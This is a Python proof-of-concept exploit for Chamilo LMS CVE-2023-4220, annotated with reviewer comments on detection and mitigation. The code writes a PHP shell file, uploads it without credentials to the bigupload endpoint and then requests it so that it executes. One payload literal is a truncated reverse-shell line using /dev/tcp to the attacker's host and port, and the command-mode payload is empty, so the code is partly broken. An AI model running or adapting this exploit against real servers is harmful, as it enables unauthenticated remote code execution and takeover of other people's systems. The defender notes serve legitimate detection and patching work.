# Proof-of-concept client for Chamilo LMS CVE-2023-4220 (identifier taken from
# the argparse description below).
#
# What the visible code does, in order:
#   1. Writes a PHP file named "shell.php" into the current working directory.
#   2. POSTs that file as the multipart field "bigUploadFile" to
#      <url>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported
#      The request carries no cookie, token or credentials.
#   3. GETs <url>/main/inc/lib/javascript/bigupload/files/shell.php and, in
#      command mode, prints the response body.
#
# Defender notes (derived from the request pattern above):
#   - Detection: in web-server access logs, look for a POST to bigUpload.php
#     with action=post-unsupported followed by a GET for a script file under
#     bigupload/files/. On disk, unexpected script files in that directory are
#     an indicator worth investigating.
#   - Mitigation: apply the vendor fix for CVE-2023-4220, configure the web
#     server so that nothing under bigupload/files/ is executed as PHP, and
#     restrict or remove the bigupload endpoint if it is not needed.
#
# NOTE(review): both PHP payload literals below appear truncated in this
# listing (markup was probably stripped during extraction). They are kept
# exactly as shown and not reconstructed.
import argparse
import requests
import os  # NOTE(review): not used anywhere in the visible code

# Colors for terminal output
RED = '\033[0;31m'
GREEN = '\033[0;32m'
YELLOW = '\033[0;33m'
RESET = '\033[0m'

# File name for the reverse shell script
# This is also the name the file is requested under after upload, so it is the
# name a defender would see in the bigupload/files/ directory and in logs.
rev_shell_filename = "shell.php"

# Parse command-line options
# Only --url is required; --command selects command mode, otherwise the
# reverse-shell branch is taken using --localIP / --localPort.
parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220')
parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port')
parser.add_argument('-c', '--command', help='Command to execute on server')
parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell')
parser.add_argument('-lport', '--localPort', help='Local port for reverse shell')
args = parser.parse_args()

host_url = args.url
command_to_execute = args.command
local_ip = args.localIP
local_port = args.localPort

# Create the PHP reverse shell or command execution script
# The file is written locally first and is not removed afterwards.
with open(rev_shell_filename, "w", encoding='utf-8') as file:
    if command_to_execute:
        # As shown here the literal is empty, so command mode writes an
        # empty file; the original payload text is missing from this listing.
        shell_content = f''
    else:
        # Only the tail of the payload survives in this listing. local_ip and
        # local_port are interpolated unvalidated and are None when the
        # corresponding options are omitted.
        shell_content = f'& /dev/tcp/{local_ip}/{local_port} 0>&1\'"); ?>'
    file.write(shell_content)

# Upload the PHP script to the target server
try:
    with open(rev_shell_filename, 'rb') as file:
        # Multipart field name expected by the upload endpoint.
        files = {'bigUploadFile': file}
        upload_url = f"{host_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
        response = requests.post(upload_url, files=files)
        # Only the HTTP status is checked: any non-4xx/5xx response is
        # reported as a successful upload, whether or not the file was stored.
        response.raise_for_status()
        print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}")
except requests.exceptions.RequestException as e:
    print(f"{RED}File upload failed: {e}{RESET}")
    exit(1)

# Provide information for reverse shell
if not command_to_execute:
    print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}")

# Execute the uploaded script or get the result
# This step relies on the server executing PHP from the upload directory;
# denying script execution there makes the response the raw file (or an
# error) instead of command output.
result_url = f"{host_url}/main/inc/lib/javascript/bigupload/files/{rev_shell_filename}"
response = requests.get(result_url)
if command_to_execute:
    print(f"{GREEN}{response.text}{RESET}")